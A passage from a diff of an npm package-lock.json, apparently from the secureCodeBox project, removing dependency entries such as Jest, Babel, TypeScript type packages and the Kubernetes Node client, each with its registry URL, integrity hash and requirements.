"resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.1.1.tgz", - "integrity": "sha512-sQXCasFk+U8lWYEe66WxRDOE9PjVz4vSM51fTu3Hw+ClTpUSQb718772vH3pyS5pShp6lvQM7SxgIDXXXmOX7w==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.0", - "@jridgewell/sourcemap-codec": "^1.4.10" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", - "dev": true, - "requires": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "openid-client": "^5.3.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" - }, - "dependencies": { - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", - "dev": true - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dev": true, - "requires": { - "argparse": "^2.0.1" - } - } - } - }, - "@securecodebox/parser-sdk-nodejs": { - "version": "file:../parser-sdk/nodejs", - "requires": { - "@kubernetes/client-node": "^0.22.3", - "ajv": "^8.17.1", - "ajv-draft-04": "^1.0.0", - "ajv-formats": "^3.0.1", - "axios": "^1.7.8", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" - } - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==", - "dev": true - }, - "@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/js-yaml": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", - "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==", - "dev": true - }, - "@types/node": { - "version": "20.17.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.10.tgz", - "integrity": "sha512-/jrvh5h6NXhEauFFexRin69nA0uHJ5gwk4iDivp/DeoEua3uwCUto6PC86IpRITBOs4+6i2I56K5x5b6WYGXHA==", - "dev": true, - "requires": { - "undici-types": "~6.19.2" - } - }, - "@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", - "dev": true, - "requires": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" - }, - "dependencies": { - "form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "dev": true, - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/tough-cookie": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.1.tgz", - "integrity": "sha512-Y0K95ThC3esLEYD6ZuqNek29lNX2EM1qxV8y2FTLUB0ff5wWrk7az+mLrnNFUnaXcgKye22+sFBRXOgpPILZNg==", - "dev": true - }, - "@types/ws": { - "version": "8.5.4", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.4.tgz", - "integrity": "sha512-zdQDHKUgcX/zBc4GrwsE/7dVdAD8JR4EuiAXiiUhhfyIJXXb2+PrGshFyeXWQPMmmZ2XxgaqclgpIC7eTXc1mg==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dev": true, - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dev": true, - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "dev": true - }, - "async": { - "version": "3.2.6", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", - "dev": true - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=", - "dev": true - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", - "dev": true - }, - "aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==", - "dev": true - }, - "babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "requires": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dev": true, - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "requires": { - "fill-range": "^7.0.1" - } - }, - "browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", - "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - } - }, - "bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "requires": { - "fast-json-stable-stringify": "2.x" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", - "dev": true - }, - "ci-info": { - "version": "3.7.1", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.7.1.tgz", - "integrity": "sha512-4jYS4MOAaCIStSRwiuxc4B8MYhIe676yO1sYGzARnjXkWpmzZMMYxY6zu8WYWDhSuth5zhrQ1rhNSibyyvv4/w==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dev": true, - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": 